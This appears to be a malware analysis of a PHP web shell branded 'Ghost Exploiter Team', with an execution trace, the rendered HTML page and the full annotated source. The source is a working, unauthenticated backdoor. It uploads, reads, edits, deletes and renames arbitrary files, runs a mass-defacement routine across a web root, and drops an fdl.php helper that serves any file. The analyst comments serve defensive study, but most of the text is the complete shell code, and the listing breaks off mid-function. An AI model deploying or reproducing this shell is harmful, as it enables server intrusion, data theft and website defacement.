2	54	0	0.002284	455848	round	0		/var/www/html/uploads/minishell.php	339	2	0.0556640625	3
2	54	1	0.002297	455920
2	54	R			0.056
1		A						/var/www/html/uploads/minishell.php	339	$jumlah = 0.056
1		A						/var/www/html/uploads/minishell.php	343	$jumlah = '0.056KB'
2	55	0	0.002332	455992	wordlimit	1		/var/www/html/uploads/minishell.php	348	2	'prepend.php'	???
2		A						/var/www/html/uploads/minishell.php	515	$word = 'prepend.php'
2	55	1	0.002355	455992
2	55	R			'prepend.php'
2	56	0	0.002370	455880	clearfile	1		/var/www/html/uploads/minishell.php	351	1	'prepend.php'
3	57	0	0.002383	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'prepend.php'
3	57	1	0.002397	455976
3	57	R			'prepend.php'
2	56	1	0.002410	455880
2	56	R			'prepend.php'
2	58	0	0.002424	455880	clearfile	1		/var/www/html/uploads/minishell.php	358	1	'prepend.php'
3	59	0	0.002436	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'prepend.php'
3	59	1	0.002450	455976
3	59	R			'prepend.php'
2	58	1	0.002464	455880
2	58	R			'prepend.php'
2	60	0	0.002598	455880	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'prepend.php'
3	61	0	0.002612	455880	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'prepend.php'
3	61	1	0.002627	455976
3	61	R			'prepend.php'
2	60	1	0.002640	455880
2	60	R			'prepend.php'
2	62	0	0.002653	455976	clearfile	1		/var/www/html/uploads/minishell.php	364	1	'prepend.php'
3	63	0	0.002666	455976	str_replace	0		/var/www/html/uploads/minishell.php	535	3	' '	'_'	'prepend.php'
3	63	1	0.002680	456072
3	63	R			'prepend.php'
2	62	1	0.002694	455976
2	62	R			'prepend.php'
1		A						/var/www/html/uploads/minishell.php	500	$fdlvalue = '<?php  \n$file_url = $_POST["dlpath"]."/".$_POST["dlname"];  \nheader("Content-Type: application/octet-stream");  \nheader("Content-Transfer-Encoding: utf-8");   \nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\"");   \nreadfile($file_url);  \n?>  '
2	64	0	0.002732	455880	fopen	0		/var/www/html/uploads/minishell.php	507	2	'fdl.php'	'w'
2	64	1	0.002766	456512
2	64	R			resource(5) of type (stream)
1		A						/var/www/html/uploads/minishell.php	507	$dlwrite = resource(5) of type (stream)
2	65	0	0.002795	456440	fwrite	0		/var/www/html/uploads/minishell.php	508	2	resource(5) of type (stream)	'<?php  \n$file_url = $_POST["dlpath"]."/".$_POST["dlname"];  \nheader("Content-Type: application/octet-stream");  \nheader("Content-Transfer-Encoding: utf-8");   \nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\"");   \nreadfile($file_url);  \n?>  '
2	65	1	0.002826	456504
2	65	R			275
2	66	0	0.002842	456440	fclose	0		/var/www/html/uploads/minishell.php	509	1	resource(5) of type (stream)
2	66	1	0.002857	456048
2	66	R			TRUE
1	3	1	0.002873	456016
			0.002903	320936
TRACE END   [2023-02-13 01:44:14.135503]


Generated HTML code

<html><head>
	<title>Shell Bypass 403 GE-C666C</title>
<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
	font-family: monospace;
	font-weight: 800;
}
body {
	font-size: 120%;
	color: #fff;
	padding: 0;
	margin: 25% 10% 10% 10%;
	background-color: #111;
	text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
	margin: auto;
	margin-bottom: 20px;
	width: 96%;
}
table td {
	transition: all .5s;
}
.data-table {
	border-collapse: collapse;
	font-size: 110%;
	min-width: 600px;
}
.data-table th, 
.data-table td {
	border: none;
	padding: 7px 15px;
	width: 33%;
}
h3.title{
	margin-bottom: 20px;
	margin-top: 0px;
	text-align: left;
	background-color: #f00;
	padding: 10px;
	font-weight: 900;
	font-size: 160%;
	font-family: New Rocker;
}
.data-table tbody td {
	color: #fff;
	background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
	text-align: left;
}
.data-table tbody td:first-child{
	text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
	background-color: #222;
}
.data-table tbody tr:hover td {
	background-color: #151515;
	border-color: #ccc;
}
.data-table tbody tr.stamp td {
	color: #fff;
	background-color: #000;
}
.data-table tbody tr.data td.nick {
	color: #f00;
}
.kotak{
	border: 2px solid #f00;
	width: 100%;;
	border-radius: 6px;
	box-shadow: rgba(0,0,0,1) 3px 3px 5em;
	padding-bottom: 10px;
}
.btn{
	background-color: #f00;
	border-radius: 5px;
	border: 2px solid red;
	width: 75px;
	height: 27px;
	font-size: 0.8em;
	font-weight: 600;
	color: #fff;
	outline: none;
	margin: 4px;
	font-weight: 900;
	padding: 2px 3px;
	text-shadow: none;
}
.btn:hover{
	box-shadow: 0px 0px 2px 2px darkred;
}

a{
	color: #fff;
	text-decoration: none;
}
a:hover{
	color: #fff;
}
.nav_up{
	margin: 2%;;
	margin-top: 0px;
}
.stamp th{
	font-size: 140%;
}
.dirname{
	color: #f00;
}
.filename{
	color: #fff;
}
input.btn.mini{
	width: 35px;
	height: 24px;
}
.dirnav{
	margin-bottom: 20px;
}
.dirnav a{
	color: lime;
}
textarea{
	width: 95.5%;
	height: 400px;
}
.balik{
	margin-right: 200px;
}
.data-table th.det, 
.data-table td.det{
	width: 25%;
}
.fileinput{
	width: 100px;
}
.new{
	width: 160px;
}
.newf{
	width: 90px;
}
.hide{
	display: none;
}
.rmf{
	margin-right: -5px;
}
.go{
	background-color: green;
	border: none;
}
.go:hover{
	box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
	text-align: right;
	margin-top: -15px;
	margin-right: 1%;
}
.massarea{
	font-size: 60%;
	margin: 2%;
}
.mass{
	margin-left: 2%;
	margin-top: 1%;
	margin-right: 2%;
	font-size: 60%;
}
.massresult{
	margin-top: 8%;
	font-size: 80%;
	margin-left: 2%;
	text-align: left;
}
.inputmass{
	text-align: left;
}
.massbt{
	font-size: 60%;
}
.massform{
	margin-top: 6%;
}
.fbawah,.fatas{
	display: inline-block;
}
</style></head>


<body>
<div class="kotak">
	<h3 class="title">Ghost Exploiter Team Official</h3>
	<div class="fitur">
			<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
	</div>
	<div class="nav_up">

<h3 class="dirnav">Directory &gt;&gt; <a href="/">/</a><a href="?dir=/var">var</a>/<a href="?dir=/var/www">www</a>/<a href="?dir=/var/www/html">html</a>/</h3>	<form method="post" enctype="multipart/form-data">
	<input type="file" name="upload">
	<input type="submit" name="upl" value="Upload">
	</form>
	</div>
<center>
<!--Mass Deface-->

	<form method="post" class="hide massform" id="massform">
	<font color="#f00" size="6px">Mass Deface Auto Detect Domain</font><br><br><br>
		<div class="inputmass">
		<input class="mass" type="text" name="pwd" size="50" value="/var/www/html"><font color="silver" size="1px">/*Ubah Ke document_root untuk mass deface*/</font><br>
		<input class="mass" type="text" name="namasc" size="50" placeholder="namafile.ext"><br>
		</div>
		<textarea name="scdeface" width="400px" placeholder="scdeface" class="massarea"></textarea>
		<input type="submit" name="massdef" value="Start" class="btn edt"><br>
	</form><!--Table-->
	<table class="data-table" id="tabel">
		<thead>
			<tr class="stamp">
				<th>File / Folder</th>
				<th>Size</th>
				<th>Action</th>
			</tr>
		</thead>
		<tbody>
		<tr>
			<td style="color: lime">.</td>
			<td style="color: lime"><center>-</center></td>
			<td><center>
			<div id="divneww" style="display:none">
			<form method="POST">
			<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required="">
			<select name="type">
				<option disabled="disabled" selected="selected">type</option>
				<option value="file">file</option>
				<option value="dir">dir</option>
			</select>
			<input type="submit" value="Go" class="btn mini go" name="createnew">
			</form>
			</div>
			<div id="divnew"><button class="btn newf" onclick="display(&quot;divnew&quot;,&quot;divneww&quot;)">+File/Dir</button></div>			</center>
			</td>
		</tr>
	
	<tr>
	<td><a class="filename" href="?dir=/var/www/html&amp;open=beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
	<td style="color: lime;"><center>0KB</center></td>
	<td><center><form method="POST" id="beneri.se_malware_analysis_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="beneri.se_malware_analysis" required="">
	<input type="hidden" name="path" value="/var/www/html">
	<input type="hidden" name="oldname" value="beneri.se_malware_analysis">
	<input type="submit" value="Go" class="btn mini go">
	</form>
	<div id="beneri.se_malware_analysis_link">
	<form method="post" class="fatas">
	<input type="hidden" value="/var/www/html/beneri.se_malware_analysis" name="filedl">
	<input type="hidden" value="/var/www/html" name="filepath">
	<input type="submit" value="del" name="rmfile" class="btn mini rmf">
	<a href="?dir=/var/www/html&amp;ubah=beneri.se_malware_analysis" class="btn">edt</a><a class="btn" href="javascript:display(&quot;beneri.se_malware_analysis_link&quot;,&quot;beneri.se_malware_analysis_form&quot;);">ren</a></form><form action="fdl.php" method="post" class="fbawah">
	<input type="hidden" value="/var/www/html" name="dlpath">
	<input type="hidden" value="beneri.se_malware_analysis" name="dlname">
	<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
	</form></div></center>
	</td>
	</tr>
	
	<tr>
	<td><a class="filename" href="?dir=/var/www/html&amp;open=minishell.php">minishell.php</a></td>
	<td style="color: lime;"><center>12KB</center></td>
	<td><center><form method="POST" id="minishell.php_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="minishell.php" required="">
	<input type="hidden" name="path" value="/var/www/html">
	<input type="hidden" name="oldname" value="minishell.php">
	<input type="submit" value="Go" class="btn mini go">
	</form>
	<div id="minishell.php_link">
	<form method="post" class="fatas">
	<input type="hidden" value="/var/www/html/minishell.php" name="filedl">
	<input type="hidden" value="/var/www/html" name="filepath">
	<input type="submit" value="del" name="rmfile" class="btn mini rmf">
	<a href="?dir=/var/www/html&amp;ubah=minishell.php" class="btn">edt</a><a class="btn" href="javascript:display(&quot;minishell.php_link&quot;,&quot;minishell.php_form&quot;);">ren</a></form><form action="fdl.php" method="post" class="fbawah">
	<input type="hidden" value="/var/www/html" name="dlpath">
	<input type="hidden" value="minishell.php" name="dlname">
	<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
	</form></div></center>
	</td>
	</tr>
	
	</tbody>
	</table>
<!--Logger-->

</center></div></body></html>

Original PHP code

<!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->

<?php

// Analyst note: nothing in this prologue authenticates the caller; the request
// parameters below are read by anyone who can reach the script's URL.
$xNamashell = "b3p45.php";// fill in your file name (operator-set label; not referenced again in the part of the listing shown here)

// Turn off PHP error reporting and discard any buffered output, so warnings from the
// file operations further down are not shown in the response.
error_reporting(0);
@ob_clean();

// Working directory: taken verbatim from ?dir= when present (no validation or
// containment), otherwise the script's current directory.
if (isset($_GET['dir'])) {
	$dir = $_GET['dir'];
} else {
	$dir = getcwd();
}
?>

<!DOCTYPE html>
<html>
<head>
	<title>Shell Bypass 403 GE-C666C</title>
</head>

<style>
/* Analyst note: rendering this page makes the browser fetch a stylesheet from
   fonts.googleapis.com, so expect that outbound request when the sample is opened
   in an analysis browser. */
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
	font-family: monospace;
	font-weight: 800;
}
body {
	font-size: 120%;
	color: #fff;
	padding: 0;
	margin: 25% 10% 10% 10%;
	background-color: #111;
	text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
	margin: auto;
	margin-bottom: 20px;
	width: 96%;
}
table td {
	transition: all .5s;
}
.data-table {
	border-collapse: collapse;
	font-size: 110%;
	min-width: 600px;
}
.data-table th, 
.data-table td {
	border: none;
	padding: 7px 15px;
	width: 33%;
}
h3.title{
	margin-bottom: 20px;
	margin-top: 0px;
	text-align: left;
	background-color: #f00;
	padding: 10px;
	font-weight: 900;
	font-size: 160%;
	font-family: New Rocker;
}
.data-table tbody td {
	color: #fff;
	background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
	text-align: left;
}
.data-table tbody td:first-child{
	text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
	background-color: #222;
}
.data-table tbody tr:hover td {
	background-color: #151515;
	border-color: #ccc;
}
.data-table tbody tr.stamp td {
	color: #fff;
	background-color: #000;
}
.data-table tbody tr.data td.nick {
	color: #f00;
}
.kotak{
	border: 2px solid #f00;
	width: 100%;;
	border-radius: 6px;
	box-shadow: rgba(0,0,0,1) 3px 3px 5em;
	padding-bottom: 10px;
}
.btn{
	background-color: #f00;
	border-radius: 5px;
	border: 2px solid red;
	width: 75px;
	height: 27px;
	font-size: 0.8em;
	font-weight: 600;
	color: #fff;
	outline: none;
	margin: 4px;
	font-weight: 900;
	padding: 2px 3px;
	text-shadow: none;
}
.btn:hover{
	box-shadow: 0px 0px 2px 2px darkred;
}

a{
	color: #fff;
	text-decoration: none;
}
a:hover{
	color: #fff;
}
.nav_up{
	margin: 2%;;
	margin-top: 0px;
}
.stamp th{
	font-size: 140%;
}
.dirname{
	color: #f00;
}
.filename{
	color: #fff;
}
input.btn.mini{
	width: 35px;
	height: 24px;
}
.dirnav{
	margin-bottom: 20px;
}
.dirnav a{
	color: lime;
}
textarea{
	width: 95.5%;
	height: 400px;
}
.balik{
	margin-right: 200px;
}
.data-table th.det, 
.data-table td.det{
	width: 25%;
}
.fileinput{
	width: 100px;
}
.new{
	width: 160px;
}
.newf{
	width: 90px;
}
.hide{
	display: none;
}
.rmf{
	margin-right: -5px;
}
.go{
	background-color: green;
	border: none;
}
.go:hover{
	box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
	text-align: right;
	margin-top: -15px;
	margin-right: 1%;
}
.massarea{
	font-size: 60%;
	margin: 2%;
}
.mass{
	margin-left: 2%;
	margin-top: 1%;
	margin-right: 2%;
	font-size: 60%;
}
.massresult{
	margin-top: 8%;
	font-size: 80%;
	margin-left: 2%;
	text-align: left;
}
.inputmass{
	text-align: left;
}
.massbt{
	font-size: 60%;
}
.massform{
	margin-top: 6%;
}
.fbawah,.fatas{
	display: inline-block;
}
</style>
<body>
<div class="kotak">
	<h3 class="title">Ghost Exploiter Team Official</h3>
	<div class="fitur">
			<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
	</div>
	<div class="nav_up">

<?php
		// Breadcrumb: convert backslashes to forward slashes, split the path into
		// segments and print one "?dir=" link per cumulative path prefix.
		// Analyst note: the segments originate from $dir (request-controlled through
		// ?dir=) and are echoed into href attributes and link text without
		// htmlspecialchars(), so markup placed in the parameter is reflected as-is.
		$dir = str_replace("\\", "/", $dir);
		$dirs = explode("/", $dir);
	
		foreach ($dirs as $key => $value) {
			// An empty first segment means the path is absolute: open the heading and
			// print a link for the root, then move on to the next segment.
			if ($value == "" && $key == 0){
				echo '<h3 class="dirnav">Directory >> <a href="/">/</a>'; continue;
			} echo '<a href="?dir=';
	
			// Rebuild the path from the first segment up to the current one.
			for ($i=0; $i <= $key ; $i++) { 
				echo "$dirs[$i]"; if ($key !== $i) echo "/";
			} echo '">'.$value.'</a>/';
	}
	echo '</h3>';
// Upload handler: a POST carrying an "upl" field stores the uploaded file in $dir
// under the file name supplied by the client.
// Analyst note: there is no authentication, extension or content check here, and the
// return value of move_uploaded_file() is ignored, so the "file terupload!" alert is
// printed whether or not the move succeeded. $tempat, $error and $ukuranfile are
// assigned but not used inside this block.
if (isset($_POST['upl'])){
	
		$namafile = $_FILES['upload']['name'];
		$tempatfile = $_FILES['upload']['tmp_name'];
		$tempat = $_GET['dir'];
		$error = $_FILES['upload']['error'];
		$ukuranfile = $_FILES['upload']['size'];
	
		move_uploaded_file($tempatfile, $dir.'/'.$namafile);
				echo "
					<script>alert('file terupload!');</script>
					";
	}
	?>
	<form method="post" enctype="multipart/form-data">
	<input type="file" name="upload">
	<input type="submit" name="upl" value="Upload">
	</form>
	</div>
<center>
<!--Mass Deface-->
<?php
// Hidden "mass deface" form. It posts three fields: pwd (a base directory, pre-filled
// with $dir), namasc (a file name) and scdeface (file content). The fields are consumed
// by the isset($_POST['massdef']) branch later in the script.
// Analyst note: $dir is interpolated into the value attribute without escaping.
// The Indonesian hint embedded in the markup reads "change to document_root for mass deface".
echo "
	<form method='post' class='hide massform' id='massform'>
	<font color='#f00' size='6px'>Mass Deface Auto Detect Domain</font><br><br><br>
		<div class='inputmass'>
		<input class='mass' type='text' name='pwd' size='50' value='$dir'><font color='silver' size='1px'>/*Ubah Ke document_root untuk mass deface*/</font><br>
		<input class='mass' type='text' name='namasc' size='50' placeholder='namafile.ext'><br>
		</div>
		<textarea name='scdeface' width='400px' placeholder='scdeface' class='massarea'></textarea>
		<input type='submit' name='massdef' value='Start' class='btn edt'><br>
	</form>";
?>
<!--Table-->
	<table class="data-table" id="tabel">
		<thead>
			<tr class="stamp">
				<th>File / Folder</th>
				<th>Size</th>
				<th>Action</th>
			</tr>
		</thead>
		<tbody>
		<tr>
			<td style="color: lime">.</td>
			<td style="color: lime"><center>-</center></td>
			<td><center>
			<div id="divneww" style="display:none">
			<form method="POST">
			<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>
			<select name="type">
				<option disabled="disabled" selected="selected">type</option>
				<option value="file">file</option>
				<option value="dir">dir</option>
			</select>
			<input type="submit" value="Go" class="btn mini go" name="createnew"/>
			</form>
			</div>
			<?php
			// "+File/Dir" button: its onclick calls a client-side display() function (not
			// shown in this part of the listing) with the ids of this button's wrapper and
			// of the hidden create form (divneww).
			echo '<div id="divnew"><button class="btn newf" onclick=\'display("divnew","divneww")\'>+File/Dir</button></div>';
			?>
			</center>
			</td>
		</tr>
	<?php

	// Directory rows: list $dir and print one table row per sub-directory, each with a
	// hidden rename form and a delete form.
	// Analyst note: $dir and every directory name are concatenated into HTML
	// attributes, link text and a javascript: URL without escaping, so a crafted
	// directory name on disk is rendered as markup when the listing is viewed.
	// The result of scandir() is not checked before it is iterated.
	$scan = scandir($dir);

foreach ($scan as $directory) {
	// Keep only real sub-directories; skip the "." and ".." entries.
	if (!is_dir($dir.'/'.$directory) || $directory == '.' || $directory == '..') continue;

	// Name cell: link that re-opens the shell inside the sub-directory.
	echo '
	<tr class="data">
	<td class="det">
	<a class="dirname" href="?dir='.$dir.'/'.$directory.'">'.dirlimit($directory).'</a>
	</td>
	<td style="color: red;"><center>--</center></td>
	<td>
	<center>';
	// Hidden rename form: posts newname / path / oldname (handled by the
	// isset($_POST['newname']) branch).
	echo '<form method="POST" id="'.clearspace($directory).'_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="'.$directory.'" required/>
	<input type="hidden" name="path" value="'.$dir.'">
	<input type="hidden" name="oldname" value="'.$directory.'">
	<input type="submit" value="Go" class="btn mini go"/>
	</form>';
	// Delete form: posts dirdl / dirpath with the "rmdir" submit button.
	echo '<div id="'.clearspace($directory).'_link">
	<form method="post">
	<input type="hidden" value="'.$dir.'/'.$directory.'" name="dirdl">
	<input type="hidden" value="'.$dir.'" name="dirpath">
	<input type="submit" value="del" name="rmdir" class="btn mini">';
	// "ren" link: swaps the delete controls for the rename form on the client side.
	echo '<a class="btn" href=\'javascript:display("'.clearspace($directory).'_link","'.clearspace($directory).'_form");\'>ren</a>';
	echo '</form>
	</div>
	</center>
	</td>
	</tr>
	';
	}
// File rows: one table row per regular file, showing its size and offering rename,
// delete, edit and download controls.
// Analyst note: file names and $dir are written into attributes, link text and a
// javascript: URL without escaping. The download form posts to fdl.php, a helper
// file that this same script writes to disk further down.
foreach ($scan as $file) {
	if (!is_file($dir.'/'.$file)) continue;

	// Size in KB rounded to 3 decimals; from 1024 KB upward it is shown in MB with
	// 2 decimals.
	$jumlah = filesize($dir.'/'.$file)/1024;
	$jumlah = round($jumlah, 3);
	if ($jumlah >= 1024) {
		$jumlah = round($jumlah/1024, 2).'MB';
	} else {
		$jumlah = $jumlah .'KB';
	}

	// Name cell: link that opens the file in the read-only viewer (?open=).
	echo '
	<tr>
	<td><a class="filename" href="?dir='.$dir.'&open='.$file.'">'.wordlimit($file).'</a></td>
	<td style="color: lime;"><center>'.$jumlah.'</center></td>
	<td><center>';
	// Hidden rename form: posts newname / path / oldname.
	echo '<form method="POST" id="'.clearfile($file).'_form" class="hide">
	<input name="newname" class="fileinput" type="text" size="20" value="'.$file.'" required/>
	<input type="hidden" name="path" value="'.$dir.'">
	<input type="hidden" name="oldname" value="'.$file.'">
	<input type="submit" value="Go" class="btn mini go"/>
	</form>';
	// Delete form (filedl / filepath with the "rmfile" button) and the edit link (?ubah=).
	echo '
	<div id="'.clearfile($file).'_link">
	<form method="post" class="fatas">
	<input type="hidden" value="'.$dir.'/'.$file.'" name="filedl">
	<input type="hidden" value="'.$dir.'" name="filepath">
	<input type="submit" value="del" name="rmfile" class="btn mini rmf">
	<a href="?dir='.$dir.'&ubah='.$file.'" class="btn">edt</a>';
	echo '<a class="btn" href=\'javascript:display("'.clearfile($file).'_link","'.clearfile($file).'_form");\'>ren</a>';
	// Download form: posts dlpath / dlname to fdl.php.
	echo '</form><form action="fdl.php" method="post" class="fbawah">
	<input type="hidden" value="'.$dir.'" name="dlpath">
	<input type="hidden" value="'.$file.'" name="dlname">
	<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
	</form></div></center>
	</td>
	</tr>
	';
}

// Close the listing table.
echo '
	</tbody>
	</table>
';

/*action*/
// File viewer: ?open=<name> hides the listing table and prints the contents of
// <dir>/<name> in a textarea.
// Analyst note: both path parts are read from the query string with no containment
// check, so the read is limited only by the file permissions of the PHP process.
// The file content is passed through htmlspecialchars() before output. This branch
// reads $_GET['dir'] directly rather than the $dir variable set at the top.
if (isset($_GET['open'])) {
	echo '
	<br />
	<style>
		table{
			display: none;
		}
	</style>
	<textarea>'.htmlspecialchars(file_get_contents($_GET['dir'].'/'.$_GET['open'])).'</textarea>
	';
}

// File delete: unlinks the path posted in "filedl" and, on success, redirects the
// browser to the directory posted in "filepath".
// Analyst note: the posted path is used as-is with no containment check, and
// "filepath" is written into an inline <script> without escaping.
if (isset($_POST['rmfile'])) {
	if (unlink($_POST['filedl'])) {
		echo "<script>alert('Delete Ok !');window.location='?dir=".$_POST['filepath']."';</script>";
	}
}

// Directory delete: removes the regular files matched by "<dirdl>/*", then calls
// rmdir() on the directory itself.
// Analyst note: sub-directories are not descended into, and a "*" glob pattern does
// not match dot-files, so rmdir() fails (the "err" alert) when either is present.
// "dirdl" and "dirpath" are taken from the POST body unvalidated and are written
// into inline <script> blocks without escaping.
if (isset($_POST['rmdir'])){
	$files = glob(''.$_POST['dirdl'].'/*');
	foreach ($files as $file) {
		if (is_file($file)){
			unlink($file); // delete file
		}
	}
	if(rmdir($_POST['dirdl'])){
		echo "<script>alert('Delete Ok !');window.location='?dir=".$_POST['dirpath']."';</script>";
	}else{
		echo "<script>alert('err ".$_POST['dirdl']."!');</script>";
	}
}

// Editor: ?ubah=<name> shows <dir>/<name> in an editable textarea. When the request
// also carries a POSTed "edit" field, the file named in the hidden "object" field is
// overwritten with that content first.
// Analyst note: the write target is whatever path the client posts in "object"; it is
// not re-derived from ?dir=/?ubah= on the server. The fopen() result is not checked,
// and an empty "edit" value makes fwrite() return 0, which takes the err() branch.
if(isset($_GET['ubah'])){
	if(isset($_POST['edit'])){
		// Mode 'w' truncates the target before writing.
		$fp = fopen($_POST['object'], 'w');
		if(fwrite($fp,$_POST['edit'])){
			echo "<script>alert('Edit Ok !');window.location='?dir=".$_GET['dir']."';</script>";
		}else{
			err();
		}
		fclose($fp);
	}
	
// Path of the file shown in the editor, built from the two query parameters.
$hell = $_GET['dir'];
$yeah = $_GET['ubah'];
$patc = "$hell/$yeah";

// Editor form: $patc and $dir are placed in attributes unescaped; only the file
// content goes through htmlspecialchars().
echo '<style>
			table {
				display: none;
			}
		</style>

		<form method="post" action="">
		<input type="hidden" name="object" value="'.$patc.'">
		<textarea name="edit">'.htmlspecialchars(file_get_contents($patc)).'</textarea>
		<a href="?dir='.$dir.'" class="balik"><=Back</a>
		<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>
		</form>
		';
}
// Rename: moves <path>/<oldname> to <path>/<newname>, all three taken from the POST
// body, and reports the result through ok() / err().
// Analyst note: none of the values are validated, so "oldname" and "newname" may
// contain path separators and the rename is not confined to "path".
if(isset($_POST['newname'])){
	if(rename($_POST['path'].'/'.$_POST['oldname'], $_POST['path'] . '/' .$_POST['newname'])){
		ok();
	}else{
		err();
	}
}
// Create: makes an empty file or a directory named "createname" inside $dir,
// depending on the posted "type".
// Analyst note: "createname" is appended to $dir unvalidated. The isset($newfl) test
// is always true because the variable was just assigned, and the handle returned by
// fopen() is never closed. The 'Pilih type !' alert means "Choose a type!".
if(isset($_POST['createnew']) && $_POST['createname'] != ''){
	if($_POST['type'] == 'file'){
		$newfl = $dir. '/' . $_POST['createname'];
		if(isset($newfl)){
			// Mode 'w' creates the file, or truncates it if it already exists.
			if(fopen($newfl,'w')){
				ok();
			}else{
				err();
			}
		}
	}elseif($_POST['type'] == 'dir'){
		$newdir = $dir. '/' .$_POST['createname'];
		if(mkdir($newdir)){
			ok();
		}else{
			err();
		}
	}else{
		echo "<script>alert('Pilih type !');</script>";
	}
}
// Mass-deface handler: writes the posted content (scdeface) to the posted file name
// (namasc) relative to the script's working directory, then copies that file into
// every entry of the posted base directory (pwd) and prints a URL for each entry
// whose name resembles a host name.
// Analyst note for incident response: the effect on disk is one staging copy next to
// the shell plus a same-named copy of it in each directory under the base directory
// that accepted the write. fopen()/fwrite() results are not checked and copy()
// errors are suppressed with @.
if(isset($_POST['massdef'])){
echo '<style>
			table {
				display: none;
			}
		</style>';
$nama = $_POST['namasc'];
$sc = $_POST['scdeface'];
// Staging copy, written to a path relative to the current working directory.
$bikin = fopen($nama, "w");
		 fwrite($bikin, $sc);
		 fclose($bikin);
$root = $_POST['pwd'];
$scan = scandir($root);
echo "<div class='massresult'>";
echo "<font color='lime'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";
foreach ( $scan as $a ) {
	// Note: this overwrites the script-wide $dir with the bare entry name.
	$dir = $a;
	$full = $root.'/'.$a.'/'.$nama;
	$ekse = @copy($nama, $full);
	if($ekse) { 
	/* light filtering: only entries matching word-characters, dot(s), letters are printed */
		if(preg_match('/[\w]+[.]+[a-z]+/i', $dir,$match)) {
			echo "http://$dir/$nama\n";
		}
	}
}
// The closing Indonesian text tells the operator to fill in any directory/domain
// that was not detected.
echo "\n\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\nPutra Gans tq</textarea>";
echo "</div>";
}

// Download helper: this statement run is outside any condition, so every request to
// the shell (re)writes a file named fdl.php at a relative path, i.e. in the current
// working directory of the PHP process.
// The dropped file concatenates POST "dlpath" and "dlname" and streams that file as
// an attachment via readfile(); it contains no authentication or path restriction.
// Analyst note for clean-up: fdl.php is a second artefact of this sample. It is a
// self-contained script, so it keeps working if only the main shell is removed.
$fdlvalue = '<?php  
$file_url = $_POST["dlpath"]."/".$_POST["dlname"];  
header("Content-Type: application/octet-stream");  
header("Content-Transfer-Encoding: utf-8");   
header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\"");   
readfile($file_url);  
?>  ';
// Mode 'w' truncates any existing fdl.php; the fopen() result is not checked.
$dlwrite = fopen('fdl.php', 'w');
fwrite($dlwrite, $fdlvalue);
fclose($dlwrite);
/*function*/
/**
 * Shorten a file name for display in the listing table.
 *
 * A name longer than $limit is cut to $limit-3 characters and followed by a red
 * "..." marker; shorter names are returned unchanged. The length test uses strlen()
 * (bytes) while the cut uses mb_substr() (characters), so the two disagree on
 * multi-byte names.
 *
 * Analyst note: the name is returned without HTML escaping and the caller echoes it
 * into the page.
 *
 * @param string $file  file name; the caller in this listing passes scandir() entries
 * @param int    $limit maximum display length, default 26
 * @return string HTML fragment for the name cell
 */
function wordlimit($file,$limit=26){
	if(strlen($file)>$limit)
	$word = mb_substr($file,0,$limit-3)."<font color=#f00>...</font>";
	else
	$word = $file;
	return $word;          
}
/**
 * Shorten a directory name for display in the listing table.
 *
 * Same logic as wordlimit() with a default limit of 22 and a white "..." marker:
 * the length is tested in bytes (strlen) and the cut is made in characters
 * (mb_substr).
 *
 * Analyst note: the name is returned without HTML escaping and the caller echoes it
 * into the page.
 *
 * @param string $directory directory name; the caller in this listing passes scandir() entries
 * @param int    $limit     maximum display length, default 22
 * @return string HTML fragment for the name cell
 */
function dirlimit($directory,$limit=22){
	if(strlen($directory)>$limit)
	$dirlim = mb_substr($directory,0,$limit-3)."<font color=#fff>...</font>";
	else
	$dirlim = $directory;
	return $dirlim;          
}
/**
 * Print the success feedback used by the rename and create handlers: a JavaScript
 * alert ("Berhasil !" = "Success!") followed by window.location='', which navigates
 * to the current URL.
 */
function ok(){
	echo "<script>alert('Berhasil !');window.location='';</script>";
}
/**
 * Print the failure feedback used by the edit, rename and create handlers: a
 * JavaScript alert ("Gagal !" = "Failed!") followed by window.location='', which
 * navigates to the current URL.
 */
function err(){
	echo "<script>alert('Gagal !');window.location='';</script>";
}
/**
 * Turn a directory name into the prefix used for element ids in the listing
 * ("<prefix>_form", "<prefix>_link") by replacing spaces with underscores.
 *
 * Analyst note: only spaces are replaced. Quotes and angle brackets pass through
 * unchanged into the id attribute and the javascript: link built by the caller.
 *
 * @param string $directory directory name
 * @return string the name with every space replaced by "_"
 */
function clearspace($directory){
	return str_replace(" ","_",$directory);
}
/**
 * Turn a file name into the prefix used for element ids in the listing
 * ("<prefix>_form", "<prefix>_link") by replacing spaces with underscores.
 * The body is identical to clearspace().
 *
 * Analyst note: only spaces are replaced. Quotes and angle brackets pass through
 * unchanged into the id attribute and the javascript: link built by the caller.
 *
 * @param string $file file name
 * @return string the name with every space replaced by "_"
 */
function clearfile($file){
